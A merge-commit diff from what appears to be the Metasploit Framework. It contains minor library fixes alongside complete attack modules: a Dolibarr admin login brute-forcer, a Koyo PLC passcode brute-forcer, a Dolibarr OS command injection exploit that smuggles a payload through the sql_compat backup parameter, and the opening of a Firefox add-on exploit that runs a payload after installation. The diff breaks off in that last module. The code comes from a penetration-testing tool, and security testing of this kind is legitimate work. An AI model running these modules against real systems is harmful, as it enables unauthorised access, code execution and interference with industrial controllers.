Merge branch 'rapid7' into bap-refactor
commit
28534d5f6e
|
@ -334,7 +334,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
|
|||
|
||||
# Find the first non-loopback address
|
||||
if not nhost
|
||||
iface = ifaces.select{|i| i.ip != "127.0.0.1" }
|
||||
iface = ifaces.select{|i| i.ip != "127.0.0.1" and i.ip != "::1" }
|
||||
if iface.length > 0
|
||||
nhost = iface.first.ip
|
||||
end
|
||||
|
|
|
@ -2205,14 +2205,19 @@ class DBManager
|
|||
|
||||
data = ""
|
||||
::File.open(filename, 'rb') do |f|
|
||||
data = f.read(f.stat.size)
|
||||
data = f.read(4)
|
||||
end
|
||||
|
||||
case data[0,4]
|
||||
when "PK\x03\x04"
|
||||
data = Zip::ZipFile.open(filename)
|
||||
when "\xd4\xc3\xb2\xa1", "\xa1\xb2\xc3\xd4"
|
||||
data = PacketFu::PcapFile.new.readfile(filename)
|
||||
data = PacketFu::PcapFile.new(:filename => filename)
|
||||
else
|
||||
::File.open(filename, 'rb') do |f|
|
||||
sz = f.stat.size
|
||||
data = f.read(sz)
|
||||
end
|
||||
end
|
||||
if block
|
||||
import(args.merge(:data => data)) { |type,data| yield type,data }
|
||||
|
@ -2260,7 +2265,10 @@ class DBManager
|
|||
end
|
||||
|
||||
if data and data.kind_of? PacketFu::PcapFile
|
||||
raise DBImportError.new("The pcap file provided is empty.") if data.body.empty?
|
||||
# Don't check for emptiness here because unlike other formats, we
|
||||
# haven't read any actual data in yet, only magic bytes to discover
|
||||
# that this is indeed a pcap file.
|
||||
#raise DBImportError.new("The pcap file provided is empty.") if data.body.empty?
|
||||
@import_filedata ||= {}
|
||||
@import_filedata[:type] = "Libpcap Packet Capture"
|
||||
return :libpcap
|
||||
|
@ -2458,7 +2466,7 @@ class DBManager
|
|||
filename = args[:filename]
|
||||
wspace = args[:wspace] || workspace
|
||||
|
||||
data = PacketFu::PcapFile.new.readfile(filename)
|
||||
data = PacketFu::PcapFile.new(:filename => filename)
|
||||
import_libpcap(args.merge(:data => data))
|
||||
end
|
||||
|
||||
|
@ -2478,7 +2486,7 @@ class DBManager
|
|||
seen_hosts = {}
|
||||
decoded_packets = 0
|
||||
last_count = 0
|
||||
data.body.map {|p| p.data}.each do |p|
|
||||
data.read_packet_bytes do |p|
|
||||
if (decoded_packets >= last_count + 1000) and block
|
||||
yield(:pcap_count, decoded_packets)
|
||||
last_count = decoded_packets
|
||||
|
|
|
@ -524,7 +524,10 @@ module Exploit::Remote::HttpClient
|
|||
#
|
||||
def target_uri
|
||||
begin
|
||||
URI(datastore['TARGETURI'])
|
||||
# In case TARGETURI is empty, at least we default to '/'
|
||||
u = datastore['TARGETURI']
|
||||
u = "/" if u.nil? or u.empty?
|
||||
URI(u)
|
||||
rescue ::URI::InvalidURIError
|
||||
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
|
||||
raise Msf::OptionValidateError.new(['TARGETURI'])
|
||||
|
|
|
@ -526,6 +526,7 @@ class Db
|
|||
print_line " -p,--port <portspec> List vulns matching this port spec"
|
||||
print_line " -s <svc names> List vulns matching these service names"
|
||||
print_line " -S,--search Search string to filter by"
|
||||
print_line " -i,--info Display Vuln Info"
|
||||
print_line
|
||||
print_line "Examples:"
|
||||
print_line " vulns -p 1-65536 # only vulns with associated services"
|
||||
|
@ -541,6 +542,7 @@ class Db
|
|||
port_ranges = []
|
||||
svcs = []
|
||||
search_term = nil
|
||||
show_info = false
|
||||
|
||||
# Short-circuit help
|
||||
if args.delete "-h"
|
||||
|
@ -571,6 +573,8 @@ class Db
|
|||
svcs = service.split(/[\s]*,[\s]*/)
|
||||
when '-S', '--search'
|
||||
search_term = /#{args.shift}/nmi
|
||||
when '-i', '--info'
|
||||
show_info = true
|
||||
else
|
||||
# Anything that wasn't an option is a host to search for
|
||||
unless (arg_host_range(arg, host_ranges))
|
||||
|
@ -600,11 +604,12 @@ class Db
|
|||
next unless ports.empty? or ports.include? vuln.service.port
|
||||
# Same for service names
|
||||
next unless svcs.empty? or svcs.include?(vuln.service.name)
|
||||
print_status("Time: #{vuln.created_at} Vuln: host=#{host.address} port=#{vuln.service.port} proto=#{vuln.service.proto} name=#{vuln.name} refs=#{reflist.join(',')}")
|
||||
print_status("Time: #{vuln.created_at} Vuln: host=#{host.address} name=#{vuln.name} refs=#{reflist.join(',')} #{(show_info && vuln.info) ? "info=#{vuln.info}" : ""}")
|
||||
|
||||
else
|
||||
# This vuln has no service, so it can't match
|
||||
next unless ports.empty? and svcs.empty?
|
||||
print_status("Time: #{vuln.created_at} Vuln: host=#{host.address} name=#{vuln.name} refs=#{reflist.join(',')}")
|
||||
print_status("Time: #{vuln.created_at} Vuln: host=#{host.address} name=#{vuln.name} refs=#{reflist.join(',')} #{(show_info && vuln.info) ? "info=#{vuln.info}" : ""}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
== LICENSE
|
||||
|
||||
Copyright (c) 2008-2011, Tod Beardsley
|
||||
Copyright (c) 2008-2012, Tod Beardsley
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
|
|
|
@ -265,8 +265,11 @@ module PacketFu
|
|||
warn "Packet ##{packet_count} is corrupted: expected #{len.to_i}, got #{pcap_packet.data.size}. Exiting."
|
||||
break
|
||||
end
|
||||
if block
|
||||
yield pcap_packet
|
||||
else
|
||||
pcap_packets << pcap_packet.clone
|
||||
yield pcap_packets.last if block
|
||||
end
|
||||
end
|
||||
ensure
|
||||
file_handle.close
|
||||
|
@ -317,6 +320,7 @@ module PacketFu
|
|||
|
||||
def initialize(args={})
|
||||
init_fields(args)
|
||||
@filename = args.delete :filename
|
||||
super(args[:endian], args[:head], args[:body])
|
||||
end
|
||||
|
||||
|
@ -361,6 +365,18 @@ module PacketFu
|
|||
self.read! fdata
|
||||
end
|
||||
|
||||
# Calls the class method with this object's @filename
|
||||
def read_packet_bytes(fname=@filename,&block)
|
||||
raise ArgumentError, "Need a file" unless fname
|
||||
return self.class.read_packet_bytes(fname, &block)
|
||||
end
|
||||
|
||||
# Calls the class method with this object's @filename
|
||||
def read_packets(fname=@filename,&block)
|
||||
raise ArgumentError, "Need a file" unless fname
|
||||
return self.class.read_packets(fname, &block)
|
||||
end
|
||||
|
||||
# file_to_array() translates a libpcap file into an array of packets.
|
||||
# Note that this strips out pcap timestamps -- if you'd like to retain
|
||||
# timestamps and other libpcap file information, you will want to
|
||||
|
|
|
@ -132,7 +132,7 @@ module PacketFu
|
|||
# method that returns an array rather than just the first candidate.
|
||||
end
|
||||
|
||||
# Handles ifconfig for various (okay, one) platforms. Mac guys, fix this and submit a patch!
|
||||
# Handles ifconfig for various (okay, two) platforms.
|
||||
# Will have Windows done shortly.
|
||||
#
|
||||
# Takes an argument (either string or symbol) of the interface to look up, and
|
||||
|
@ -182,8 +182,32 @@ module PacketFu
|
|||
ret[:ip6_saddr] = $1
|
||||
ret[:ip6_obj] = IPAddr.new($1)
|
||||
end
|
||||
end
|
||||
end # linux
|
||||
when /darwin/i
|
||||
ifconfig_data = %x[ifconfig #{iface}]
|
||||
if ifconfig_data =~ /#{iface}/i
|
||||
ifconfig_data = ifconfig_data.split(/[\s]*\n[\s]*/)
|
||||
else
|
||||
raise ArgumentError, "Cannot ifconfig #{iface}"
|
||||
end
|
||||
real_iface = ifconfig_data.first
|
||||
ret[:iface] = real_iface.split(':')[0]
|
||||
ifconfig_data.each do |s|
|
||||
case s
|
||||
when /ether[\s]([0-9a-fA-F:]{17})/i
|
||||
ret[:eth_saddr] = $1
|
||||
ret[:eth_src] = EthHeader.mac2str(ret[:eth_saddr])
|
||||
when /inet[\s]*([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)(.*Mask:([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+))?/i
|
||||
ret[:ip_saddr] = $1
|
||||
ret[:ip_src] = [IPAddr.new($1).to_i].pack("N")
|
||||
ret[:ip4_obj] = IPAddr.new($1)
|
||||
ret[:ip4_obj] = ret[:ip4_obj].mask($3) if $3
|
||||
when /inet6[\s]*([0-9a-fA-F:\x2f]+)/
|
||||
ret[:ip6_saddr] = $1
|
||||
ret[:ip6_obj] = IPAddr.new($1)
|
||||
end
|
||||
end # darwin
|
||||
end # RUBY_PLATFORM
|
||||
ret
|
||||
end
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
module PacketFu
|
||||
|
||||
# Check the repo's for version release histories
|
||||
VERSION = "1.1.3" # Unscrewing the 1.1.2 gem
|
||||
VERSION = "1.1.5" # Unscrewing the 1.1.4 gem
|
||||
|
||||
# Returns PacketFu::VERSION
|
||||
def self.version
|
||||
|
|
|
@ -197,7 +197,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Can be used for telnet as well if telnet is enabled.
|
||||
report_note(
|
||||
:host => ip,
|
||||
:port => 21,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:sname => 'ftp',
|
||||
:ntype => 'scada.modicon.ftp-password',
|
||||
|
|
|
@ -0,0 +1,123 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Dolibarr ERP & CRM 3 Login Utility',
|
||||
'Description' => %q{
|
||||
This module attempts to authenticate to a Dolibarr ERP/CRM's admin web intarface,
|
||||
and should only work against version 3.1.1 or older, because these versions do not
|
||||
have any default protections against brute-forcing.
|
||||
},
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
|
||||
File.join(Msf::Config.install_root, "data", "wordlists", "http_default_userpass.txt") ]),
|
||||
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
|
||||
File.join(Msf::Config.install_root, "data", "wordlists", "http_default_users.txt") ]),
|
||||
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
|
||||
File.join(Msf::Config.install_root, "data", "wordlists", "http_default_pass.txt") ]),
|
||||
OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/dolibarr/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def get_sid_token
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => @uri.path
|
||||
})
|
||||
|
||||
# Get the session ID from the cookie
|
||||
m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
|
||||
id = (m.nil?) ? nil : m[1]
|
||||
|
||||
# Get the token from the decompressed HTTP body response
|
||||
m = res.body.match(/type="hidden" name="token" value="(.+)"/)
|
||||
token = (m.nil?) ? nil : m[1]
|
||||
|
||||
return id, token
|
||||
end
|
||||
|
||||
def do_login(user, pass)
|
||||
#
|
||||
# Get a new session ID/token. That way if we get a successful login,
|
||||
# we won't get a false positive due to reusing the same sid/token.
|
||||
#
|
||||
sid, token = get_sid_token
|
||||
if sid.nil? or token.nil?
|
||||
print_error("#{@peer} - Unable to obtain session ID or token, cannot continue")
|
||||
return :abort
|
||||
else
|
||||
vprint_status("#{@peer} - Using sessiond ID: #{sid}")
|
||||
vprint_status("#{@peer} - Using token: #{token}")
|
||||
end
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{@uri.path}index.php",
|
||||
'cookie' => sid,
|
||||
'vars_post' => {
|
||||
'token' => token,
|
||||
'loginfunction' => 'loginfunction',
|
||||
'tz' => '-6',
|
||||
'dst' => '1',
|
||||
'screenwidth' => '1093',
|
||||
'screenheight' => '842',
|
||||
'username' => user,
|
||||
'password' => pass
|
||||
}
|
||||
})
|
||||
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
|
||||
vprint_error("#{@peer} - Service failed to respond")
|
||||
return :abort
|
||||
end
|
||||
|
||||
location = res.headers['Location']
|
||||
if location =~ /admin\//
|
||||
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
|
||||
report_auth_info({
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:sname => (ssl ? 'https' : 'http'),
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:proof => location,
|
||||
:source_type => 'user_supplied'
|
||||
})
|
||||
return :next_user
|
||||
else
|
||||
vprint_error("#{@peer} - Bad login: \"#{user}:#{pass}\"")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
@uri = target_uri
|
||||
@uri.path << "/" if @uri.path[-1, 1] != "/"
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
each_user_pass { |user, pass|
|
||||
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
|
||||
do_login(user, pass)
|
||||
}
|
||||
end
|
||||
end
|
|
@ -21,9 +21,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'Koyo DirectLogic PLC Password Brute Force Utility',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module attempts to authenticate to
|
||||
a locked Koyo DirectLogic PLC. The PLC uses a restrictive
|
||||
passcode, which can be A0000000 through A9999999.
|
||||
This module attempts to authenticate to a locked Koyo DirectLogic PLC.
|
||||
The PLC uses a restrictive passcode, which can be A0000000 through A9999999.
|
||||
The "A" prefix can also be changed by the administrator to any other character,
|
||||
which can be set through the PREFIX option of this module.
|
||||
|
||||
This module is based on the original 'koyobrute.rb' Basecamp module from
|
||||
DigitalBond.
|
||||
|
@ -43,12 +44,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptAddress.new('LHOST', [false, "The local IP address to bind to"]),
|
||||
OptInt.new('RECV_TIMEOUT', [false, "Time (in seconds) to wait between packets", 3]),
|
||||
OptString.new('PREFIX', [true, 'The prefix to use for the password (default: A)', "A"]),
|
||||
Opt::RPORT(28784)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@CCITT_16 = [
|
||||
@@CCITT_16 = [
|
||||
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
|
||||
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
|
||||
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
|
||||
|
@ -82,41 +84,42 @@ class Metasploit3 < Msf::Auxiliary
|
|||
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
|
||||
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
|
||||
]
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@udp_sock ||= {}
|
||||
@udp_sock[ip] = Rex::Socket::Udp.create(
|
||||
'LocalHost' => datastore['LHOST'] || nil,
|
||||
'PeerHost' => ip,
|
||||
'PeerPort' => rport,
|
||||
|
||||
# Create a socket in order to receive responses from a non-default IP
|
||||
@udp_sock = Rex::Socket::Udp.create(
|
||||
'PeerHost' => rhost,
|
||||
'PeerPort' => rport.to_i,
|
||||
'Context' => {'Msf' => framework, 'MsfExploit' => self}
|
||||
)
|
||||
print_status("#{ip}:#{rport} - KOYO - Checking the controller for locked memory...")
|
||||
if unlock_check(ip)
|
||||
print_good("#{ip}:#{rport} - Unlocked!")
|
||||
add_socket(@udp_sock)
|
||||
|
||||
print_status("#{rhost}:#{rport} - KOYO - Checking the controller for locked memory...")
|
||||
|
||||
if unlock_check
|
||||
# TODO: Report a vulnerability for an unlocked controller?
|
||||
print_good("#{rhost}:#{rport} - Unlocked!")
|
||||
return
|
||||
else
|
||||
print_status("#{ip}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
|
||||
print_status("#{rhost}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
|
||||
end
|
||||
|
||||
# TODO: Consider sort_by {rand} in order to avoid sequential guessing
|
||||
# or something fancier
|
||||
|
||||
(0..9999999).each do |i|
|
||||
|
||||
passcode = 'A' + i.to_s.rjust(7,'0')
|
||||
vprint_status("#{ip}:#{rport} - KOYO - Trying #{passcode}")
|
||||
|
||||
passcode = datastore['PREFIX'] + i.to_s.rjust(7,'0')
|
||||
vprint_status("#{rhost}:#{rport} - KOYO - Trying #{passcode}")
|
||||
bytes = passcode.scan(/../).map { |x| x.to_i(16) }
|
||||
passstr = bytes.pack("c*")
|
||||
print_debug passstr.inspect
|
||||
passstr = bytes.pack("C*")
|
||||
res = try_auth(passstr)
|
||||
next if not res
|
||||
|
||||
res = try_auth(ip, passstr)
|
||||
if res
|
||||
print_good "#{ip}:#{rport} - KOYO - Found passcode: #{passcode}"
|
||||
print_good "#{rhost}:#{rport} - KOYO - Found passcode: #{passcode}"
|
||||
report_auth_info(
|
||||
:host => ip,
|
||||
:port => rport,
|
||||
:host => rhost,
|
||||
:port => rport.to_i,
|
||||
:proto => 'udp',
|
||||
:user => '',
|
||||
:pass => passcode, # NOTE: Human readable
|
||||
|
@ -124,17 +127,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def crc16(buf, crc=0)
|
||||
buf.each_byte{|x| crc = ((crc<<8) ^ @CCITT_16[(crc>>8) ^ x])&0xffff}
|
||||
[crc].pack("S")
|
||||
buf.each_byte{|x| crc = ((crc << 8) ^ @@CCITT_16[( crc >> 8) ^ x]) & 0xffff }
|
||||
[crc].pack("v")
|
||||
end
|
||||
|
||||
def unlock_check(ip)
|
||||
def unlock_check
|
||||
checkpacket = "HAP\xe6\x01\x6e\x68\x0d\x00\x1a\x00\x09\x00\x01\x50\x01\x02\x00\x01\x00\x17\x52"
|
||||
@udp_sock[ip].sendto(checkpacket, ip, datastore['RPORT'].to_i)
|
||||
@udp_sock.sendto(checkpacket, rhost, rport.to_i)
|
||||
|
||||
recvpacks = 0
|
||||
# TODO: Since the packet count is critical, consider using Capture instead,
|
||||
|
@ -144,10 +147,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
#
|
||||
# Another way to speed things up is to use fancy threading, but that's for another
|
||||
# day.
|
||||
while (r = @udp_sock[ip].recvfrom(65535, 0.1) and recvpacks < 2)
|
||||
while (r = @udp_sock.recvfrom(65535, 0.1) and recvpacks < 2)
|
||||
res = r[0]
|
||||
if res.length == 269 # auth reply packet
|
||||
if res[17] == "\x00" and res[19] == "\xD2" # Magic bytes
|
||||
if res[17,1] == "\x00" and res[19,1] == "\xD2" # Magic bytes
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
@ -156,19 +159,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return false
|
||||
end
|
||||
|
||||
def try_auth(ip, passstr)
|
||||
def try_auth(passstr)
|
||||
data = "\x1a\x00\x0d\x00\x01\x51\x01\x19\x02\x04\x00" + passstr + "\x17\xaf"
|
||||
header = "HAP"
|
||||
header += "\xe5\x01" # random session ID
|
||||
header += crc16(data)
|
||||
header += [data.length].pack("S")
|
||||
header += [data.length].pack("v")
|
||||
authpacket = header + data
|
||||
|
||||
@udp_sock[ip].sendto(authpacket, ip, datastore['RPORT'].to_i, 0)
|
||||
@udp_sock.sendto(authpacket, rhost, rport.to_i)
|
||||
|
||||
2.times { @udp_sock[ip].get(recv_timeout) } # talk to the hand
|
||||
2.times { @udp_sock.get(recv_timeout) } # talk to the hand
|
||||
|
||||
status = unlock_check(ip)
|
||||
status = unlock_check
|
||||
|
||||
return status
|
||||
end
|
||||
|
@ -180,9 +183,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
datastore['RECV_TIMEOUT'].to_i.abs
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
@udp_sock.each_pair { |ip,sock| sock.shutdown rescue nil}
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -0,0 +1,180 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Dolibarr ERP/CRM's
|
||||
backup feature. This software is used to manage a company's business
|
||||
information such as contacts, invoices, orders, stocks, agenda, etc.
|
||||
When processing a database backup request, the export.php function
|
||||
does not check the input given to the sql_compat parameter, which allows
|
||||
a remote authenticated attacker to inject system commands into it,
|
||||
and then gain arbitrary code execution.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Nahuel Grisolia <nahuel[at]cintainfinita.com.ar>', #Discovery, PoC
|
||||
'sinn3r' #Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://seclists.org/fulldisclosure/2012/Apr/78']
|
||||
],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd'
|
||||
},
|
||||
'Platform' => ['unix', 'linux'],
|
||||
'Targets' =>
|
||||
[
|
||||
# Older versions are probably also vulnerable according to
|
||||
# Nahuel's report on full disclosure
|
||||
['Dolibarr 3.1.1 on Linux', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Apr 6 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('USERNAME', [true, 'Dolibarr Username', 'admin']),
|
||||
OptString.new('PASSWORD', [true, 'Dolibarr Password', 'test']),
|
||||
OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/dolibarr/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => target_uri.path
|
||||
})
|
||||
|
||||
if res.body =~ /Dolibarr 3\.1\.1/
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def get_sid_token
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => @uri.path
|
||||
})
|
||||
|
||||
# Get the session ID from the cookie
|
||||
m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
|
||||
id = (m.nil?) ? nil : m[1]
|
||||
|
||||
# Get the token from the decompressed HTTP body response
|
||||
m = res.body.match(/type="hidden" name="token" value="(.+)"/)
|
||||
token = (m.nil?) ? nil : m[1]
|
||||
|
||||
return id, token
|
||||
end
|
||||
|
||||
def login(sid, token)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{@uri.path}index.php",
|
||||
'cookie' => sid,
|
||||
'vars_post' => {
|
||||
'token' => token,
|
||||
'loginfunction' => 'loginfunction',
|
||||
'tz' => '-6',
|
||||
'dst' => '1',
|
||||
'screenwidth' => '1093',
|
||||
'screenheight' => '842',
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
}
|
||||
})
|
||||
|
||||
location = res.headers['Location']
|
||||
return (location =~ /admin\//)
|
||||
end
|
||||
|
||||
def exploit
|
||||
@uri = target_uri
|
||||
@uri.path << "/" if @uri.path[-1, 1] != "/"
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
print_status("#{peer} - Getting the sid and token...")
|
||||
sid, token = get_sid_token
|
||||
if sid.nil?
|
||||
print_error("#{peer} - Unable to retrieve a session ID")
|
||||
return
|
||||
elsif token.nil?
|
||||
print_error("#{peer} - Unable to retrieve a token")
|
||||
return
|
||||
end
|
||||
|
||||
user = datastore['USERNAME']
|
||||
pass = datastore['PASSWORD']
|
||||
print_status("#{peer} - Attempt to login with \"#{user}:#{pass}\"")
|
||||
success = login(sid, token)
|
||||
if not success
|
||||
print_error("#{peer} - Unable to login")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{peer} - Sending malicious request...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => @uri.path + "admin/tools/export.php",
|
||||
'cookie' => sid,
|
||||
'vars_post' => {
|
||||
'token' => token,
|
||||
'export_type' => 'server',
|
||||
'what' => 'mysql',
|
||||
'mysqldump' => '/usr/bin/mysqldump',
|
||||
'use_transaction' => 'yes',
|
||||
'disable_fk' => 'yes',
|
||||
'sql_compat' => ";#{payload.encoded};",
|
||||
'sql_structure' => 'structure',
|
||||
'drop' => '1',
|
||||
'sql_data' => 'data',
|
||||
'showcolumns' => 'yes',
|
||||
'extended_ins' => 'yes',
|
||||
'delayed' => 'yes',
|
||||
'sql_ignore' => 'yes',
|
||||
'hexforbinary' => 'yes',
|
||||
'filename_template' => 'mysqldump_dolibarrdebian_3.1.1_201203231716.sql',
|
||||
'compression' => 'none'
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
Notes:
|
||||
|
||||
114 if ($_POST["sql_compat"] && $_POST["sql_compat"] != 'NONE') $param.=" --compatible=".$_POST["sql_compat"];
|
||||
...
|
||||
137 $paramcrypted=$param;
|
||||
...
|
||||
159 $fullcommandcrypted=$command." ".$paramcrypted." 2>&1";
|
||||
...
|
||||
165 if ($handle)
|
||||
166 {
|
||||
....
|
||||
169 $handlein = popen($fullcommandclear, 'r');
|
||||
....
|
||||
185 }
|
||||
=end
|
|
@ -0,0 +1,224 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'rex/zip'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize( info = {} )
|
||||
super( update_info( info,
|
||||
'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
|
||||
'Description' => %q{
|
||||
This exploit dynamically creates a .xpi addon file.
|
||||
The resulting bootstrapped Firefox addon is presented to
|
||||
the victim via a web page with. The victim's Firefox browser
|
||||
will pop a dialog asking if they trust the addon.
|
||||
|
||||
Once the user clicks "install", the addon is installed and
|
||||
executes the payload with full user permissions. As of Firefox
|
||||
4, this will work without a restart as the addon is marked to
|
||||
be "bootstrapped". As the addon will execute the payload after
|
||||
each Firefox restart, an option can be given to automatically
|
||||
uninstall the addon once the payload has been executed.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'mihi' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ]
|
||||
],
|
||||
'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)',
|
||||
{
|
||||
'Platform' => ['java'],
|
||||
'Arch' => ARCH_JAVA
|
||||
}
|
||||
],
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Linux x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Mac OS X PPC (Native Payload)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_PPC,
|
||||
}
|
||||
],
|
||||
[ 'Mac OS X x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1
|
||||
))
|
||||
|
||||
register_options( [
|
||||
OptString.new('ADDONNAME', [ true,
|
||||
"The addon name.",
|
||||
"HTML5 Rendering Enhancements"
|
||||
]),
|
||||
OptBool.new('AutoUninstall', [ true,
|
||||
"Automatically uninstall the addon after payload execution",
|
||||
true
|
||||
])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_request_uri( cli, request )
|
||||
if not request.uri.match(/\.xpi$/i)
|
||||
if not request.uri.match(/\/$/)
|
||||
send_redirect( cli, get_resource() + '/', '')
|
||||
return
|
||||
end
|
||||
|
||||
print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )
|
||||
|
||||
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
|
||||
return
|
||||
end
|
||||
|
||||
p = regenerate_payload(cli)
|
||||
if not p
|
||||
print_error("Failed to generate the payload.")
|
||||
# Send them a 404 so the browser doesn't hang waiting for data
|
||||
# that will never come.
|
||||
send_not_found(cli)
|
||||
